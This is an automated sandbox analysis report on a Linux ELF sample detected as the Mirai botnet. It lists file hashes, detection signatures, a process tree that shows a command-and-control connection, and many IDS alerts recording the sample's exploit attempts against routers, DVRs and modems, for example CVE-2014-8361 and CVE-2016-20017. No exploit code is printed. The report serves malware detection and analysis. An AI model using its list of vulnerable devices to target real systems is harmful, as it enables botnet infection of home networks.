Create Interactive Tour

Linux Analysis Report
SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf

Overview

General Information

Sample Name:	SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Analysis ID:	1347350
MD5:	78f926e5a126c60fdfcc8f1ad8408f23
SHA1:	0d7406252edad6a3917633019d18ae9725cb6c16
SHA256:	0730e802398d5c9587f52806f5f35b749dec4b2a275d4cdc84aa27e60f4cd42e
Tags:	elf
Infos:

Detection

Mirai

Score:	88
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Detected Mirai

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Sample is packed with UPX

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1347350
Start date and time:	2023-11-24 11:27:05 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
Detection:	MAL
Classification:	mal88.troj.evad.linELF@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf
PID:	6235
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Connected To CNC
Standard Error:

Process Tree

system is lnxubuntu20

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf (PID: 6235, Parent: 6154, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6237, Parent: 6235)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6239, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6240, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6243, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6244, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6247, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6249, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6250, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6251, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6252, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6253, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6255, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6256, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6263, Parent: 6237)

SecuriteInfo.com.Linux.Siggen.9999.23998.17519.elf New Fork (PID: 6265, Parent: 6237)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
6235.1.00007f2b34400000.00007f2b3441a000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Snort Signatures

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.127.181.223

Timestamp:	192.168.2.23212.127.181.22340306802025756 11/24/23-11:27:55.093583
SID:	2025756
Source Port:	40306
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M2 - Source IP: 192.168.2.23 - Destination IP: 52.114.254.48

Timestamp:	192.168.2.2352.114.254.4856278528692831300 11/24/23-11:27:59.482397
SID:	2831300
Source Port:	56278
Destination Port:	52869
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.110.143.228

Timestamp:	192.168.2.2395.110.143.22859082802027121 11/24/23-11:27:55.337197
SID:	2027121
Source Port:	59082
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 146.75.38.201

Timestamp:	192.168.2.23146.75.38.20151266802025883 11/24/23-11:27:56.521853
SID:	2025883
Source Port:	51266
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.155.77

Timestamp:	192.168.2.23172.64.155.774673480802018132 11/24/23-11:27:57.660527
SID:	2018132
Source Port:	46734
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.127.181.223

Timestamp:	192.168.2.23212.127.181.22340306802831299 11/24/23-11:27:55.093583
SID:	2831299
Source Port:	40306
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 194.78.4.14

Timestamp:	192.168.2.23194.78.4.1441832802030092 11/24/23-11:27:59.221852
SID:	2030092
Source Port:	41832
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.53.245.94

Timestamp:	192.168.2.23212.53.245.9435782802835221 11/24/23-11:27:58.974588
SID:	2835221
Source Port:	35782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 47.57.247.226

Timestamp:	192.168.2.2347.57.247.22659850802025883 11/24/23-11:27:56.448586
SID:	2025883
Source Port:	59850
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.61.221.140

Timestamp:	192.168.2.2398.61.221.1405244280802018132 11/24/23-11:27:57.292192
SID:	2018132
Source Port:	52442
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 184.27.60.91

Timestamp:	192.168.2.23184.27.60.9158754802030092 11/24/23-11:27:56.713670
SID:	2030092
Source Port:	58754
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.102.64.146

Timestamp:	192.168.2.2324.102.64.1464748075472023548 11/24/23-11:27:59.190577
SID:	2023548
Source Port:	47480
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.41.43

Timestamp:	192.168.2.23172.64.41.434847280802018132 11/24/23-11:27:57.285153
SID:	2018132
Source Port:	48472
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.44.55

Timestamp:	192.168.2.2395.101.44.5537650802027121 11/24/23-11:27:54.907095
SID:	2027121
Source Port:	37650
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 102.129.222.57

Timestamp:	192.168.2.23102.129.222.5760508802025883 11/24/23-11:27:56.582311
SID:	2025883
Source Port:	60508
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.43.243.139

Timestamp:	192.168.2.2395.43.243.13941056802027121 11/24/23-11:27:54.931855
SID:	2027121
Source Port:	41056
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 54.217.53.43

Timestamp:	192.168.2.2354.217.53.4334432802025883 11/24/23-11:27:56.617088
SID:	2025883
Source Port:	34432
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.86.22.9

Timestamp:	192.168.2.23186.86.22.94898875472023548 11/24/23-11:27:59.359795
SID:	2023548
Source Port:	48988
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.206.84.137

Timestamp:	192.168.2.23119.206.84.1374664275472023548 11/24/23-11:27:58.650329
SID:	2023548
Source Port:	46642
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.227.213.16

Timestamp:	192.168.2.23212.227.213.1642610802049119 11/24/23-11:27:54.702570
SID:	2049119
Source Port:	42610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.149.224

Timestamp:	192.168.2.23172.66.149.2245674680802018132 11/24/23-11:27:57.660528
SID:	2018132
Source Port:	56746
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 149.30.176.145

Timestamp:	192.168.2.23149.30.176.14548862802030092 11/24/23-11:27:59.326151
SID:	2030092
Source Port:	48862
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.82.132.52

Timestamp:	192.168.2.23201.82.132.523935075472023548 11/24/23-11:27:58.357741
SID:	2023548
Source Port:	39350
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.124.20.15

Timestamp:	192.168.2.23212.124.20.1551358802025756 11/24/23-11:27:55.118236
SID:	2025756
Source Port:	51358
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.151.5.35

Timestamp:	192.168.2.2347.151.5.354693875472023548 11/24/23-11:27:59.354188
SID:	2023548
Source Port:	46938
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.76.63.175

Timestamp:	192.168.2.2323.76.63.17551512802025883 11/24/23-11:27:59.132433
SID:	2025883
Source Port:	51512
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 58.109.58.169

Timestamp:	192.168.2.2358.109.58.1693401475472023548 11/24/23-11:27:59.088605
SID:	2023548
Source Port:	34014
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.108.134.33

Timestamp:	192.168.2.23212.108.134.3336696802835221 11/24/23-11:27:55.134353
SID:	2835221
Source Port:	36696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.106.69.173

Timestamp:	192.168.2.23177.106.69.1734737875472023548 11/24/23-11:27:59.068929
SID:	2023548
Source Port:	47378
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 38.181.43.71

Timestamp:	192.168.2.2338.181.43.7158452802025883 11/24/23-11:28:00.176349
SID:	2025883
Source Port:	58452
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 194.105.129.214

Timestamp:	192.168.2.23194.105.129.21435414802025883 11/24/23-11:27:54.690179
SID:	2025883
Source Port:	35414
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M2 - Source IP: 192.168.2.23 - Destination IP: 31.136.2.117

Timestamp:	192.168.2.2331.136.2.11756468528692831300 11/24/23-11:27:59.678544
SID:	2831300
Source Port:	56468
Destination Port:	52869
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 54.145.244.138

Timestamp:	192.168.2.2354.145.244.13847750802030092 11/24/23-11:28:00.114797
SID:	2030092
Source Port:	47750
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 23.33.143.7

Timestamp:	192.168.2.2323.33.143.736524802831299 11/24/23-11:27:54.702136
SID:	2831299
Source Port:	36524
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 59.7.27.155

Timestamp:	192.168.2.2359.7.27.1555309675472023548 11/24/23-11:27:58.646745
SID:	2023548
Source Port:	53096
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.194.217

Timestamp:	192.168.2.2395.101.194.21742826802027121 11/24/23-11:27:58.832111
SID:	2027121
Source Port:	42826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Source IP: 192.168.2.23 - Destination IP: 52.114.254.48

Timestamp:	192.168.2.2352.114.254.4856148528692025132 11/24/23-11:27:59.305669
SID:	2025132
Source Port:	56148
Destination Port:	52869
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 54.201.44.163

Timestamp:	192.168.2.2354.201.44.16353632802025756 11/24/23-11:27:55.478081
SID:	2025756
Source Port:	53632
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.100.75.203

Timestamp:	192.168.2.2395.100.75.20360116802027121 11/24/23-11:27:58.822536
SID:	2027121
Source Port:	60116
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 31.136.2.117

Timestamp:	192.168.2.2331.136.2.11756468528692027339 11/24/23-11:27:59.678544
SID:	2027339
Source Port:	56468
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.248.186.137

Timestamp:	192.168.2.2388.248.186.13747476802027121 11/24/23-11:27:54.723680
SID:	2027121
Source Port:	47476
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 165.227.246.63

Timestamp:	192.168.2.23165.227.246.6349938802025883 11/24/23-11:27:54.692760
SID:	2025883
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.191.204.13

Timestamp:	192.168.2.2398.191.204.134051280802018132 11/24/23-11:27:57.329259
SID:	2018132
Source Port:	40512
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Source IP: 192.168.2.23 - Destination IP: 31.136.2.117

Timestamp:	192.168.2.2331.136.2.11756446528692025132 11/24/23-11:27:59.495893
SID:	2025132
Source Port:	56446
Destination Port:	52869
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.106.69.173

Timestamp:	192.168.2.23177.106.69.1734718675472023548 11/24/23-11:27:58.823676
SID:	2023548
Source Port:	47186
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 47.93.253.139

Timestamp:	192.168.2.2347.93.253.13943928802025883 11/24/23-11:27:54.821531
SID:	2025883
Source Port:	43928
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.230.134.95

Timestamp:	192.168.2.2334.230.134.9553086802025883 11/24/23-11:27:59.121280
SID:	2025883
Source Port:	53086
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.227.213.16

Timestamp:	192.168.2.23212.227.213.1642610802835221 11/24/23-11:27:54.702570
SID:	2835221
Source Port:	42610
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.217.246.235

Timestamp:	192.168.2.2395.217.246.23540686802027121 11/24/23-11:27:59.461061
SID:	2027121
Source Port:	40686
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.157.240

Timestamp:	192.168.2.23172.66.157.2404324480802018132 11/24/23-11:27:56.658346
SID:	2018132
Source Port:	43244
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 170.130.83.21

Timestamp:	192.168.2.23170.130.83.2142486802025883 11/24/23-11:27:54.660821
SID:	2025883
Source Port:	42486
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 184.27.60.91

Timestamp:	192.168.2.23184.27.60.9158754802025883 11/24/23-11:27:56.713670
SID:	2025883
Source Port:	58754
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 82.157.120.251

Timestamp:	192.168.2.2382.157.120.25146152802030092 11/24/23-11:27:59.903751
SID:	2030092
Source Port:	46152
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.108.134.33

Timestamp:	192.168.2.23212.108.134.3336696802831299 11/24/23-11:27:55.134353
SID:	2831299
Source Port:	36696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 88.151.16.189

Timestamp:	192.168.2.2388.151.16.18949220802027121 11/24/23-11:27:58.813769
SID:	2027121
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 41.108.209.129

Timestamp:	192.168.2.2341.108.209.1295408275472023548 11/24/23-11:27:59.609745
SID:	2023548
Source Port:	54082
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.101.213.160

Timestamp:	192.168.2.2395.101.213.16053314802027121 11/24/23-11:27:58.840727
SID:	2027121
Source Port:	53314
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 149.30.176.145

Timestamp:	192.168.2.23149.30.176.14548862802025883 11/24/23-11:27:59.326151
SID:	2025883
Source Port:	48862
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.107.31.17

Timestamp:	192.168.2.23211.107.31.174374075472023548 11/24/23-11:27:59.536110
SID:	2023548
Source Port:	43740
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.179.227.184

Timestamp:	192.168.2.2395.179.227.18447802802027121 11/24/23-11:27:59.425025
SID:	2027121
Source Port:	47802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) - Source IP: 192.168.2.23 - Destination IP: 95.53.245.150

Timestamp:	192.168.2.2395.53.245.15036806802027121 11/24/23-11:27:54.952805
SID:	2027121
Source Port:	36806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 212.53.245.94

Timestamp:	192.168.2.23212.53.245.9435782802049119 11/24/23-11:27:58.974588
SID:	2049119
Source Port:	35782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 52.114.254.48

Timestamp:	192.168.2.2352.114.254.4856278528692027339 11/24/23-11:27:59.482397
SID:	2027339
Source Port:	56278
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 194.65.120.166

Timestamp:	192.168.2.23194.65.120.16658954802049119 11/24/23-11:27:55.549758
SID:	2049119
Source Port:	58954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT D-Link DSL-2750B - OS Command Injection - Source IP: 192.168.2.23 - Destination IP: 212.132.247.49

Timestamp:	192.168.2.23212.132.247.4938936802025756 11/24/23-11:27:55.467937
SID:	2025756
Source Port:	38936
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 47.57.247.226

Timestamp:	192.168.2.2347.57.247.22659850802030092 11/24/23-11:27:56.448586
SID:	2030092
Source Port:	59850
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 121.199.43.21

Timestamp:	192.168.2.23121.199.43.2152610802030092 11/24/23-11:27:56.427795
SID:	2030092
Source Port:	52610
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 39.62.208.129

Timestamp:	192.168.2.2339.62.208.1293818675472023548 11/24/23-11:27:57.866516
SID:	2023548
Source Port:	38186
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.60.138.179

Timestamp:	192.168.2.2345.60.138.17954426802030092 11/24/23-11:27:54.606824
SID:	2030092
Source Port:	54426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.201.179.21

Timestamp:	192.168.2.2323.201.179.2159182802025883 11/24/23-11:27:59.450940
SID:	2025883
Source Port:	59182
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.230.134.95

Timestamp:	192.168.2.2334.230.134.9553086802030092 11/24/23-11:27:59.121280
SID:	2030092
Source Port:	53086
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 212.124.20.15

Timestamp:	192.168.2.23212.124.20.1551358802831299 11/24/23-11:27:55.118236
SID:	2831299
Source Port:	51358
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.27.45.212

Timestamp:	192.168.2.2372.27.45.2124972075472023548 11/24/23-11:27:58.432504
SID:	2023548
Source Port:	49720
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 (metasploit version) - Source IP: 192.168.2.23 - Destination IP: 194.65.120.166

Timestamp:	192.168.2.23194.65.120.16658954802831299 11/24/23-11:27:55.549758
SID:	2831299
Source Port:	58954
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.213.29.227

Timestamp:	192.168.2.23179.213.29.2275500875472023548 11/24/23-11:27:58.027087
SID:	2023548
Source Port:	55008
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT D-Link DSL-2750B Command Injection Attempt (CVE-2016-20017) - Source IP: 192.168.2.23 - Destination IP: 23.33.143.7

Timestamp:	192.168.2.2323.33.143.736524802049119 11/24/23-11:27:54.702136
SID:	2049119
Source Port:	36524
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 59.7.27.155

Timestamp:	192.168.2.2359.7.27.1555312475472023548 11/24/23-11:27:58.943512
SID:	2023548
Source Port:	53124
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 82.157.120.251

Timestamp:	192.168.2.2382.157.120.25146152802025883 11/24/23-11:27:59.903751
SID:	2025883
Source Port:	46152
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 202.124.250.231

Timestamp:	192.168.2.23202.124.250.23141262802030092 11/24/23-11:27:54.811514
SID:	2030092
Source Port:	41262
